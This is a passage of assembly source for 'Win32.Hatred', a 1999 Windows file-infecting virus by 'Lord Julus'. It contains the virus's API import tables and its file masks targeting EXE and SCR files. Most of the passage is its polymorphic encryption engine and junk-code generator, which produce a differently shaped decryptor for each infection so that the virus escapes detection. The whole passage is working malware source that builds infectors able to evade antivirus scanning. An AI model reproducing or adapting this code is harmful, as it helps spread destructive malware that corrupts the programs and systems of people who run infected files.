FT_dwHighDateTime dd ? ;
|
||
filetime ENDS ;
|
||
;
|
||
win32_find_data STRUC ;
|
||
FileAttributes dd ? ; attributes
|
||
CreationTime filetime ? ; time of creation
|
||
LastAccessTime filetime ? ; last access time
|
||
LastWriteTime filetime ? ; last modificationm
|
||
FileSizeHigh dd ? ; filesize
|
||
FileSizeLow dd ? ; -"-
|
||
Reserved0 dd ? ;
|
||
Reserved1_ dd ? ;
|
||
FileName db 260 dup (?) ; long filename
|
||
AlternateFileName db 13 dup (?) ; short filename
|
||
db 3 dup (?) ; dword padding
|
||
win32_find_data ENDS ;
|
||
|
||
MAX_PATH = 260
|
||
|
||
k32 dd 0
|
||
kernel32_name db "Kernel32.DLL", 0
|
||
advapi32_name db "ADVAPI32.dll", 0
|
||
user32_name db "USER32.dll", 0
|
||
gdi32_name db "GDI32.dll", 0
|
||
newimagebase label
|
||
imagebase dd 00400000h
|
||
getmodulehandle db "GetModuleHandleA"
|
||
getmodulehandlelen = $-offset getmodulehandle
|
||
getprocaddress db "GetProcAddress", 0
|
||
getprocaddresslen = $-offset getprocaddress
|
||
scanneddirs dd 0
|
||
searchrec win32_find_data
|
||
searchfiles win32_find_data
|
||
handle dd 0
|
||
handle1 dd 0
|
||
maphandle dd 0
|
||
searchhandle dd 0
|
||
signal dd 0
|
||
files dd 0
|
||
mapaddress dd 0
|
||
filesize dd 0
|
||
skip db 0
|
||
curdir db 260 dup (0)
|
||
tempdir db 260 dup (0)
|
||
FileTime dq 0, 0, 0
|
||
virussize equ end-start
|
||
filealign dd 0
|
||
sectionalign dd 0
|
||
oldeip dd 0
|
||
PEheader dd 0
|
||
lastsection dd 0
|
||
deltahandle dd 0
|
||
smth dd 0
|
||
fileofs dd 0
|
||
fileattributes dd 0
|
||
|
||
;------------------- Kernel32 APIS
|
||
|
||
k32_API_names label
|
||
db "GetModuleHandleA",0
|
||
db "ExitProcess", 0
|
||
db "GlobalAlloc", 0
|
||
db "GlobalFree", 0
|
||
db "GetWindowsDirectoryA", 0
|
||
db "GetSystemDirectoryA", 0
|
||
db "GetCurrentDirectoryA", 0
|
||
db "SetCurrentDirectoryA", 0
|
||
db "FindFirstFileA", 0
|
||
db "FindNextFileA", 0
|
||
db "GetDriveTypeA", 0
|
||
db "CloseHandle", 0
|
||
db "FindClose", 0
|
||
db "CreateFileA", 0
|
||
db "CreateFileMappingA", 0
|
||
db "MapViewOfFile", 0
|
||
db "UnmapViewOfFile", 0
|
||
db "SetFilePointer", 0
|
||
db "SetEndOfFile", 0
|
||
db "GetFileSize", 0
|
||
db "lstrlen", 0
|
||
db "SetFileTime", 0
|
||
db "GetFileTime", 0
|
||
db "GetProcAddress", 0
|
||
db "FlushViewOfFile", 0
|
||
db "GetLastError", 0
|
||
db "GetSystemTime", 0
|
||
db "GetFileAttributesA", 0
|
||
db "SetFileAttributesA", 0
|
||
db "DeleteFileA", 0
|
||
db "IsDebuggerPresent", 0
|
||
db 0FFh
|
||
|
||
|
||
k32_API_addrs label
|
||
|
||
_GetModuleHandleA dd 0
|
||
_ExitProcess dd 0
|
||
_GlobalAlloc dd 0
|
||
_GlobalFree dd 0
|
||
_GetWindowsDirectoryA dd 0
|
||
_GetSystemDirectoryA dd 0
|
||
_GetCurrentDirectoryA dd 0
|
||
_SetCurrentDirectoryA dd 0
|
||
_FindFirstFileA dd 0
|
||
_FindNextFileA dd 0
|
||
_GetDriveTypeA dd 0
|
||
_CloseHandle dd 0
|
||
_FindClose dd 0
|
||
_CreateFileA dd 0
|
||
_CreateFileMappingA dd 0
|
||
_MapViewOfFile dd 0
|
||
_UnmapViewOfFile dd 0
|
||
_SetFilePointer dd 0
|
||
_SetEndOfFile dd 0
|
||
_GetFileSize dd 0
|
||
_lstrlen dd 0
|
||
_SetFileTime dd 0
|
||
_GetFileTime dd 0
|
||
_GetProcAddress dd 0
|
||
_FlushViewOfFile dd 0
|
||
_GetLastError dd 0
|
||
_GetSystemTime dd 0
|
||
_GetFileAttributes dd 0
|
||
_SetFileAttributes dd 0
|
||
_DeleteFileA dd 0
|
||
_IsDebuggerPresent dd 0
|
||
|
||
;------------------- Advapi32 APIS
|
||
|
||
a32_API_names label
|
||
db "RegCreateKeyExA", 0
|
||
db "RegSetValueExA", 0
|
||
db "RegQueryValueExA", 0
|
||
db "RegOpenKeyExA", 0
|
||
db 0FFh
|
||
|
||
a32_API_addrs label
|
||
|
||
_RegCreateKeyExA dd 0
|
||
_RegSetValueExA dd 0
|
||
_RegQueryValueExA dd 0
|
||
_RegOpenKeyExA dd 0
|
||
|
||
;------------------- User32 APIs
|
||
|
||
u32_API_names label
|
||
|
||
db "MessageBoxA", 0
|
||
db "GetDC", 0
|
||
db "GetAsyncKeyState", 0
|
||
db "ExitWindowsEx", 0
|
||
db 0FFh
|
||
|
||
u32_API_addrs label
|
||
|
||
_MessageBoxA dd 0
|
||
_GetDC dd 0
|
||
_GetAsyncKeyState dd 0
|
||
_ExitWindowsEx dd 0
|
||
|
||
;------------------- GDI32 APIs
|
||
|
||
g32_API_names label
|
||
|
||
db "BitBlt", 0
|
||
db 0FFh
|
||
|
||
g32_API_addrs label
|
||
|
||
_BitBlt dd 0
|
||
|
||
|
||
IF DEBUG ;
|
||
filemasks db "GOAT*.EXE", 0 ; for debug mode only
|
||
db "GOAT*.SCR", 0 ; goat files are searched
|
||
db 0FFh ;
|
||
ELSE ;
|
||
filemasks db "*.EXE", 0 ;
|
||
db "*.SCR", 0 ;
|
||
db 0FFh ;
|
||
ENDIF
|
||
|
||
copyright db "Win32.Hatred V.1.0 "
|
||
db "(C) 1999 by Lord Julus "
|
||
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ????? ?????
|
||
; ? ? ? M?U?L?T?I?P?L?E O?P?C?O?D?E F?A?N?T?A?S?I?E?S 3?2 B?I?T ? ? ?
|
||
; ????? ?????
|
||
; ????? a polymorphic engine wrote by ?????
|
||
; ? ? ? ? ? ?
|
||
; ????? LORD JULUS - 1999 (C) ?????
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
; ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
|
||
; ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ????? ?????
|
||
;
|
||
; VERSION 2.5
|
||
;
|
||
; Parameters on entry:
|
||
;
|
||
; ESI = offset to code to encrypt
|
||
; EDI = offset to the decryptor place
|
||
; EBX = address of the offset of code to decrypt at runtime
|
||
; ECX = length of code to decrypt
|
||
;
|
||
; Returns: nothing
|
||
|
||
|
||
MOF32 proc near ; Here is the actual poly engine
|
||
pushad ; body
|
||
|
||
; First let's encrypt the area that will be decrypted later
|
||
|
||
call Choose_random_registers ; choose the random registers to use
|
||
mov dword ptr [ebp+codeaddr], ebx
|
||
push edi ; save decryptor place
|
||
push ecx ; save code in bytes
|
||
mov ebx, esi ;
|
||
add ebx, ecx ; ebx points to the end
|
||
sub ebx, 4 ; minus 1 dword
|
||
shr ecx, 2 ; we work on dwords
|
||
push ebx ecx ;
|
||
call random32 ; get a random 32bit dword in EAX
|
||
mov dword ptr [ebp+offset key], eax ; which is the encryption key
|
||
call random32 ;
|
||
mov dword ptr [ebp+offset keyvalue], eax ; the key increment
|
||
mov eax, 20h ; the static key.
|
||
call brandom32 ;
|
||
inc eax ;
|
||
mov dword ptr [ebp+offset key2], eax
|
||
mov eax, 3 ;
|
||
call brandom32 ; get a random value between 0-3
|
||
mov dword ptr [ebp+offset op1], eax ; the encryption method
|
||
mov eax, 2 ;
|
||
call brandom32 ;
|
||
mov dword ptr [ebp+offset op2], eax ; the static key method
|
||
mov eax, 3 ;
|
||
call brandom32 ;
|
||
mov dword ptr [ebp+offset op3], eax ; the 'next code' method
|
||
mov eax, 3 ;
|
||
call brandom32 ;
|
||
mov dword ptr [ebp+offset op4], eax ; the operation over the key
|
||
;
|
||
pop ecx ebx ; restore length and pointer
|
||
mov eax, [ebp+key] ; put key in eax
|
||
mov [ebp+offset codelength], ecx;
|
||
|
||
; First we encrypt the code 0 1 2
|
||
; op1 = operation over code with the key register (XOR/ADD/SUB)
|
||
; op2 = operation over code with the static key (ROR/ROL)
|
||
; op3 = operation over code with next code (XOR/ADD/SUB)
|
||
; op4 = operation over the key with the keyvalue (XOR/ADD/SUB)
|
||
|
||
mainloop:
|
||
mov edx, dword ptr [ebx] ; edx = dword to encrypt
|
||
push eax ebx ecx ;
|
||
mov ecx, [ebp+op3] ; ecx = op3
|
||
mov eax, edx ; eax, dword ptr [ebx+4]
|
||
mov ebx, dword ptr [ebx+4] ;
|
||
call makeop ; do it!
|
||
mov edx, eax ;
|
||
pop ecx ebx eax ;
|
||
push ecx ;
|
||
mov ecx, [ebp+op2] ; ecx = op2
|
||
cmp ecx, 0 ;
|
||
jne notror ;
|
||
mov ecx, [ebp+key2] ;
|
||
ror edx, cl ; ROR
|
||
jmp over1 ;
|
||
notror: ;
|
||
mov ecx, [ebp+key2] ;
|
||
rol edx, cl ; ROL
|
||
over1: ;
|
||
pop ecx ;
|
||
push eax ebx ecx ;
|
||
mov ecx, [ebp+op1] ; ecx = op1
|
||
mov ebx, eax ; we do edx, eax
|
||
mov eax, edx ;
|
||
call makeop ;
|
||
mov edx, eax ;
|
||
pop ecx ebx eax ;
|
||
;
|
||
mov dword ptr [ebx], edx ;
|
||
;
|
||
push ebx ecx ;
|
||
cmp ecx, 1 ;
|
||
je no_thankyou ;
|
||
mov ecx, [ebp+op4] ; ecx = op4
|
||
mov ebx, [ebp+keyvalue] ; we do eax, keyvalue
|
||
call makeop ;
|
||
;
|
||
no_thankyou: ;
|
||
pop ecx ebx ;
|
||
;
|
||
sub ebx, 4 ; we go back 1 dword
|
||
loop mainloop ; and loop
|
||
jmp ok ; jump over
|
||
|
||
db "Multiple Opcode Fantasies 32Bit V.2.5 by Lord Julus - 1999"
|
||
|
||
makeop: ;
|
||
cmp ecx, 0 ; is it the first method ?
|
||
jne notxor ;
|
||
xor eax, ebx ; yes, XOR!
|
||
jmp ready ;
|
||
notxor: ;
|
||
cmp ecx, 1 ; or maybe second ?
|
||
jne notadd ;
|
||
add eax, ebx ; yes, ADD!
|
||
jmp ready ;
|
||
notadd: ;
|
||
sub eax, ebx ; then, SUB!
|
||
ready: ;
|
||
ret ;
|
||
;
|
||
ok: ;
|
||
pop ecx ; restore code length
|
||
pop edi ; restore decryptor place
|
||
shr ecx, 2 ; we work on dwords
|
||
mov dword ptr [ebp+offset key], eax ; get decryption start key
|
||
add ebx, 4 ; align start of code
|
||
|
||
; eax = initial key
|
||
; ebx = initial offset
|
||
; ecx = real length in dwords
|
||
; Here we start taking, filling and writing the decryptor
|
||
|
||
lea esi, [ebp+offset decryptor] ; esi points to the decryptor
|
||
mov [ebp+counter], 1 ; counter for instructions
|
||
;
|
||
mov eax, edi ; first we make some junk so that
|
||
call makejunk ; the jump to the decryptor is
|
||
call makejunk ; always at another offset
|
||
mov ebx, edi ;
|
||
sub ebx, eax ;
|
||
mov [ebp+first_intend], ebx ;
|
||
call makejunk ; ...and some more...
|
||
;
|
||
getinstr: ;
|
||
cmp [ebp+counter], 13d ;
|
||
je over_all ;
|
||
lodsb ; load one byte
|
||
cmp al, 0FEh ; check for instruction end
|
||
je over_instr ;
|
||
cmp al, 0FFH ; check for final end
|
||
je over_all ;
|
||
stosb ; store the byte
|
||
jmp getinstr ; do it again...
|
||
;
|
||
over_instr: ;
|
||
call makeinstr ; fill the instruction
|
||
cmp [ebp+counter], 11d ;
|
||
je no_junk_please ;
|
||
call makejunk ; create junk after it
|
||
;
|
||
no_junk_please: ;
|
||
inc [ebp+counter] ; increment counter
|
||
jmp getinstr ; and do it again...
|
||
;
|
||
over_all: ; the end...
|
||
call makejunk ; ...final junk
|
||
call makejunk ;
|
||
mov [ebp+the_end], edi ; mark the end
|
||
call makejunk ; some more...
|
||
call makejunk ;
|
||
mov [ebp+end_end], edi ; real end !
|
||
popad ; restore registers
|
||
ret ; and return
|
||
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
;? Here we have the instruction maker and the junk code generator. ?
|
||
;?????????????????????????????????????????????????????????????????????????????
|
||
|
||
makeinstr proc near ; The routine to fill the instr.
|
||
pushad ; save all regs
|
||
cmp [ebp+counter], 13d ; check for counter < 13
|
||
je ok_procs ;
|
||
;
|
||
mov ebx, dword ptr [ebp+counter] ; don't tell me that this is not
|
||
dec ebx ; optimized because I know, but
|
||
cmp ebx, 0 ; it is very difficult to deal
|
||
je proc01 ; with relative shit relative
|
||
cmp ebx, 1 ; to different imagebases...
|
||
je proc02 ; so get of my back ;-)
|
||
cmp ebx, 2 ;
|
||
je proc03 ;
|
||
cmp ebx, 3 ;
|
||
je proc04 ;
|
||
cmp ebx, 4 ;
|
||
je proc05 ;
|
||
cmp ebx, 5 ;
|
||
je proc06 ;
|
||
cmp ebx, 6 ;
|
||
je proc07 ;
|
||
cmp ebx, 7 ;
|
||
je proc08 ;
|
||
cmp ebx, 8 ;
|
||
je proc09 ;
|
||
cmp ebx, 9 ;
|
||
je proc10 ;
|
||
cmp ebx, 10 ;
|
||
je proc11 ;
|
||
cmp ebx, 11 ;
|
||
je proc12 ;
|
||
jmp ok_procs ;
|
||
|
||
;Here are the procedures to fill each instruction of the real decryptor
|
||
|
||
proc01: ; mov preg, code_start
|
||
and byte ptr [edi-5], 11111000b ; clear the place for preg
|
||
mov al, byte ptr [ebp+offset preg] ;
|
||
or byte ptr [edi-5], al ; fill the preg
|
||
mov eax, dword ptr [ebp+offset codeaddr]
|
||
or dword ptr [edi-4], eax ; fill the code start value
|
||
jmp ok_procs ;
|
||
;
|
||
proc02: ; mov kreg, key
|
||
and byte ptr [edi-5], 11111000b ; clear the place for kreg
|
||
mov al, byte ptr [ebp+offset kreg] ;
|
||
or byte ptr [edi-5], al ; fill the kreg
|
||
mov eax, dword ptr [ebp+offset key] ;
|
||
or dword ptr [edi-4], eax ; fill the key value
|
||
jmp ok_procs ;
|
||
;
|
||
proc03: ; mov lreg, code_length/8
|
||
and byte ptr [edi-5], 11111000b ; clear the place for lreg
|
||
mov al, byte ptr [ebp+offset lreg] ;
|
||
or byte ptr [edi-5], al ; fill the lreg
|
||
mov eax, dword ptr [ebp+offset codelength]
|
||
or dword ptr [edi-4], eax ; fill the code length value
|
||
jmp ok_procs ;
|
||
;
|
||
proc04: ; mov creg, [preg] (mainloop)
|
||
and byte ptr [edi-1], 11000000b ; clear for pointer and code regs
|
||
mov al, byte ptr [ebp+offset preg] ;
|
||
;
|
||
cmp al, 5 ; take care of [EBP] exception
|
||
jne not_ebp ; (when we use [EBP] addressing
|
||
mov al, 0 ; mode, we need a suplemental
|
||
stosb ; 00 byte after the opcode
|
||
mov al, 5 ; and a 01000000b fill up - see
|
||
and byte ptr [edi-2], 0 ; (*))
|
||
or byte ptr [edi-2], al ; and fill them up...
|
||
mov al, byte ptr [ebp+offset creg] ;
|
||
shl al, 3 ; align like this: xxNNNxxx
|
||
or byte ptr [edi-2], al ;
|
||
or byte ptr [edi-2], 01000000b ; (*)
|
||
mov increment_flag, 1 ;
|
||
mov eax, edi ;
|
||
sub eax, 3 ;
|
||
jmp done_i04 ;
|
||
;
|
||
;
|
||
not_ebp: ;
|
||
or byte ptr [edi-1], al ; and fill them up...
|
||
mov al, byte ptr [ebp+offset creg] ;
|
||
shl al, 3 ; align like this: xxNNNxxx
|
||
or byte ptr [edi-1], al ;
|
||
mov eax, edi ;
|
||
sub eax, 2 ;
|
||
;
|
||
done_i04: ;
|
||
mov dword ptr [ebp+offset mainlp], eax;
|
||
jmp ok_procs ;
|
||
;
|
||
proc05: ; creg, kreg
|
||
and byte ptr [edi-1], 11000000b ; clear for r/m and reg
|
||
mov al, byte ptr [ebp+offset creg] ; get creg,
|
||
shl al, 3 ; align like this xxNNNxxx
|
||
or byte ptr [edi-1], al ;
|
||
mov al, byte ptr [ebp+offset kreg] ;
|
||
or byte ptr [edi-1], al ;
|
||
and byte ptr [edi-2], 0 ;
|
||
mov eax, dword ptr [ebp+offset op1] ;
|
||
lea esi, [ebp+offset un_op_code1] ;
|
||
add esi, eax ;
|
||
mov al, byte ptr [esi] ;
|
||
or byte ptr [edi-2], al ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc06: ; creg, key2
|
||
and byte ptr [edi-2], 11111000b ;
|
||
mov al, byte ptr [ebp+offset creg] ; fill creg
|
||
or byte ptr [edi-2], al ;
|
||
mov al, byte ptr [ebp+offset key2] ; fill key
|
||
or byte ptr [edi-1], al ;
|
||
mov eax, dword ptr [ebp+offset op2] ;
|
||
lea esi, [ebp+offset un_op_code3] ;
|
||
add esi, eax ;
|
||
mov al, byte ptr [esi] ;
|
||
and byte ptr [edi-2], 00000111b ;
|
||
or byte ptr [edi-2], al ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc07: ; creg, [preg+4]
|
||
and byte ptr [edi-2], 11000000b ;
|
||
mov al, byte ptr [ebp+offset preg] ;
|
||
or byte ptr [edi-2], al ;
|
||
mov al, byte ptr [ebp+offset creg] ;
|
||
shl al, 3 ;
|
||
or byte ptr [edi-2], al ;
|
||
and byte ptr [edi-3], 0 ;
|
||
mov eax, dword ptr [ebp+offset op3] ;
|
||
lea esi, [ebp+offset un_op_code1] ;
|
||
add esi, eax ;
|
||
mov al, byte ptr [esi] ;
|
||
or byte ptr [edi-3], al ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc08: ; mov [preg], creg
|
||
and byte ptr [edi-1], 11000000b ; clear for pointer and code regs
|
||
mov al, byte ptr [ebp+offset preg] ;
|
||
|
||
cmp al, 5 ; take care of [EBP] exception
|
||
jne not_ebp2 ; (check proc04 for explanation)
|
||
mov al, 0 ;
|
||
stosb ;
|
||
mov al, 5 ;
|
||
and byte ptr [edi-2], 0 ;
|
||
or byte ptr [edi-2], al ; and fill them up...
|
||
mov al, byte ptr [ebp+offset creg] ;
|
||
shl al, 3 ; align like this: xxNNNxxx
|
||
or byte ptr [edi-2], al ;
|
||
or byte ptr [edi-2], 01000000b ;
|
||
mov increment_flag, 1 ;
|
||
jmp done_i08 ;
|
||
;
|
||
not_ebp2: ;
|
||
or byte ptr [edi-1], al ; and fill them up...
|
||
mov al, byte ptr [ebp+offset creg] ;
|
||
shl al, 3 ; align like this: xxNNNxxx
|
||
or byte ptr [edi-1], al ;
|
||
;
|
||
done_i08: ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc09: ; kreg, keyvalue
|
||
and byte ptr [edi-6], 0 ;
|
||
mov eax, dword ptr [ebp+offset op4] ;
|
||
lea esi, [ebp+offset un_op_code2] ;
|
||
shl eax, 1 ;
|
||
add esi, eax ;
|
||
mov ax, word ptr [esi] ;
|
||
and word ptr [edi-6], 0 ;
|
||
or word ptr [edi-6], ax ;
|
||
and byte ptr [edi-5], 11111000b ;
|
||
mov al, byte ptr [ebp+offset kreg] ; fill kreg
|
||
or byte ptr [edi-5], al ;
|
||
mov eax, dword ptr [ebp+offset keyvalue] ; fill key
|
||
and dword ptr [edi-4], 0 ;
|
||
or dword ptr [edi-4], eax ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc10: ; sub preg, 4
|
||
and byte ptr [edi-2], 11111000b ;
|
||
mov al, byte ptr [ebp+offset preg] ;
|
||
or byte ptr [edi-2], al ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc11: ; sub lreg, 1
|
||
and byte ptr [edi-2], 11111000b ;
|
||
mov al, byte ptr [ebp+offset lreg] ;
|
||
or byte ptr [edi-2], al ;
|
||
jmp ok_procs ;
|
||
;
|
||
proc12: ; jnz mainloop
|
||
mov eax, dword ptr [ebp+offset mainlp];
|
||
mov edx, edi ;
|
||
add edx, 4 ;
|
||
sub eax, edx ;
|
||
and dword ptr [edi], 0 ;
|
||
or dword ptr [edi], eax ;
|
||
popad ;
|
||
add edi, 4 ;
|
||
jmp special_ok_procs ;
|
||
;
|
||
ok_procs: ; done!
|
||
popad ; restore all regs
|
||
;
|
||
special_ok_procs: ;
|
||
cmp [ebp+increment_flag], 1 ; If we stored suplemental bytes
|
||
jne no_increment ; we need to move edi forward.
|
||
inc edi ;
|
||
mov [ebp+increment_flag], 0 ;
|
||
;
|
||
no_increment: ;
|
||
ret ; and return
|
||
makeinstr endp ;
|
||
;
|
||
|
||
;????????????????????????????????????????????????????????????????????????????
|
||
|
||
; ?<3F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
; ?<3F><>
|
||
; ?<3F><> Lord Julus' Junk Generator Module V.1.0 (March 1999) ?
|
||
; ?<3F> <20>?
|
||
; ? <20><>?
|
||
; <20><>?
|
||
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
|
||
|
||
makejunk proc near ; This is the main junk
|
||
push eax ebx ecx edx esi ;
|
||
mov ecx, maxjunks ; routine.
|
||
junk_loop: ;
|
||
call _makejunk ;
|
||
loop junk_loop ;
|
||
pop esi edx ecx ebx eax ;
|
||
ret ;
|
||
makejunk endp ;
|
||
|
||
db "JGM - Junk Generator Module V.1.0 by Lord Julus - March 1999"
|
||
|
||
;
|
||
_makejunk proc near ; Generate junk!
|
||
push eax ;
|
||
mov eax, 5 ; choose between safe junks
|
||
call brandom32 ; and junks that might
|
||
cmp eax, 3 ; generate exception errors
|
||
jae flawable_junk ;
|
||
;
|
||
call make_sure_junk ;
|
||
jmp exit_junk ;
|
||
;
|
||
flawable_junk: ;
|
||
call make_flaw_junk ;
|
||
;
|
||
exit_junk: ;
|
||
pop eax ;
|
||
ret ; and return
|
||
_makejunk endp ;
|
||
;
|
||
make_flaw_junk proc near ; Here we will generate
|
||
push eax ebx ecx edx ; junks that could raise
|
||
mov eax, max_junk_hunk ; exception errors...
|
||
call brandom32 ;
|
||
inc eax ;
|
||
;
|
||
mov [ebp+flawable], 0 ; (mark the type)
|
||
;
|
||
mov ecx, eax ;
|
||
;
|
||
mov al, 0E9h ; ...and so we generate a
|
||
stosb ; Jump to skip them
|
||
mov [ebp+address_save], edi ; save jump place
|
||
mov eax, 0 ;
|
||
stosd ;
|
||
;
|
||
repeat_makejunk: ;
|
||
call output_one_junk ; now we make the junks
|
||
loop repeat_makejunk ;
|
||
;
|
||
push edi ;
|
||
sub edi, [ebp+address_save] ; and create the jump
|
||
mov eax, edi ; address
|
||
sub eax, 4 ;
|
||
mov edi, [ebp+address_save] ;
|
||
stosd ;
|
||
pop edi ;
|
||
;
|
||
pop edx ecx ebx eax ;
|
||
ret ;
|
||
make_flaw_junk endp ;
|
||
;
|
||
make_sure_junk proc near ;
|
||
push eax ebx ecx edx ; junks that could raise
|
||
mov eax, max_junk_hunk ; exception errors...
|
||
call brandom32 ;
|
||
inc eax ;
|
||
;
|
||
mov [ebp+flawable], 1 ; (mark type)
|
||
;
|
||
mov ecx, eax ;
|
||
;
|
||
repeat_makejunk_2: ;
|
||
call output_one_junk ; now we make the junks
|
||
loop repeat_makejunk_2 ;
|
||
;
|
||
pop edx ecx ebx eax ;
|
||
ret ;
|
||
make_sure_junk endp ;
|
||
;
|
||
output_one_junk proc ; This procedure outputs
|
||
push ecx ; one junk instruction
|
||
;
|
||
call choose_random_disp ; First choose displacements
|
||
;
|
||
choose_another: ;
|
||
mov eax, Table_numbers ; Choose one instruction
|
||
call brandom32 ; table
|
||
;
|
||
cmp [ebp+we_create_jcond], 1 ; prevent reentry
|
||
jne no_case ; when creating conditional
|
||
cmp eax, 3 ; jumps
|
||
je choose_another ;
|
||
cmp eax, 5 ;
|
||
je choose_another ;
|
||
;
|
||
no_case: ;
|
||
cmp [ebp+flawable], 1 ; if the instruction mustn't
|
||
jne go_on_unstopped ; generate exception errors
|
||
cmp eax, 0 ; we cannot use table 1!
|
||
je choose_another ;
|
||
;
|
||
go_on_unstopped: ;
|
||
lea ebx, dword ptr [ebp+junk_table_procs] ; take out the procedure
|
||
shl eax, 2 ;
|
||
add ebx, eax ;
|
||
mov eax, dword ptr [ebx] ;
|
||
add eax, ebp ;
|
||
jmp eax ; and jump to it...
|
||
;
|
||
junk_proc1: ; here we use table1
|
||
mov eax, 2 ;
|
||
call brandom32 ;
|
||
mov ebx, eax ; save possible increment
|
||
add ebx, 2 ; 2 or 3...
|
||
;
|
||
mov eax, Table1_len ; take a random operation
|
||
call brandom32 ; from the Table1
|
||
shl eax, 1 ;
|
||
lea esi, dword ptr [ebp+Table1] ;
|
||
add esi, eax ;
|
||
lodsb ;
|
||
add eax, ebx ; toggle size
|
||
stosb ;
|
||
;
|
||
lea esi, dword ptr [ebp+ModRM] ; take a modrm byte
|
||
call choose_jreg ; choose the random jreg
|
||
mov edx, eax ;
|
||
mov eax, 32 ; and a random addressing
|
||
call brandom32 ; type
|
||
mov dword ptr [ebp+row], eax ; save the row
|
||
shl eax, 3 ;
|
||
add esi, eax ;
|
||
add esi, edx ;
|
||
lodsb ;
|
||
stosb ; store modrm
|
||
;
|
||
mov eax, 2 ; choose addressing type
|
||
call brandom32 ;
|
||
;
|
||
cmp eax, 1 ; is it 32bit addressing?
|
||
je _32bit_addressing ;
|
||
;
|
||
mov ax, word ptr [edi-2] ; if it's 16bit then we
|
||
shl eax, 10 ; must go behind the opcode
|
||
dec edi ;
|
||
dec edi ;
|
||
mov al, Address_size_toggle ; and put an Address size
|
||
stosb ; toggle prefix there
|
||
shr eax, 10 ;
|
||
stosw ;
|
||
;
|
||
_16bit_addressing: ;
|
||
mov edx, dword ptr [ebp+row] ; restore row in edx
|
||
cmp edx, 6 ; DISP16 needed ?
|
||
jne not_exc_1 ;
|
||
mov ax, word ptr [ebp+disp16] ;
|
||
stosw ;
|
||
;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_1: ;
|
||
cmp edx, 7 ; Need to add a DISP8 ?
|
||
jbe not_exc_2 ;
|
||
cmp edx, 16 ;
|
||
jae not_exc_2 ;
|
||
mov al, byte ptr [ebp+disp8] ;
|
||
stosb ;
|
||
;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_2: ;
|
||
cmp edx, 15 ; Need to add a DISP16 ?
|
||
jbe not_exc_3 ;
|
||
cmp edx, 24 ;
|
||
jae not_exc_3 ;
|
||
mov ax, word ptr [ebp+disp16] ;
|
||
stosw ;
|
||
;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_3: ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
_32bit_addressing: ;
|
||
mov edx, dword ptr [ebp+row] ; restore row in edx
|
||
cmp edx, 5 ;
|
||
jne not_exc_4 ;
|
||
mov eax, dword ptr [ebp+disp32] ;
|
||
stosd ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_4: ;
|
||
cmp edx, 4 ;
|
||
je need_sib ;
|
||
cmp edx, 12 ;
|
||
je need_sib ;
|
||
cmp edx, 20 ;
|
||
je need_sib ;
|
||
;
|
||
cmp edx, 7 ; Need to add a DISP8 ?
|
||
jbe not_exc_5 ;
|
||
cmp edx, 16 ;
|
||
jae not_exc_5 ;
|
||
mov al, byte ptr [ebp+disp8] ;
|
||
stosb ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_5: ;
|
||
cmp edx, 15 ; Need to add a DISP32 ?
|
||
jbe not_exc_6 ;
|
||
cmp edx, 24 ;
|
||
jae not_exc_6 ;
|
||
mov eax, dword ptr [ebp+disp32] ;
|
||
stosd ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
not_exc_6: ;
|
||
jmp finish_processing_1 ;
|
||
;
|
||
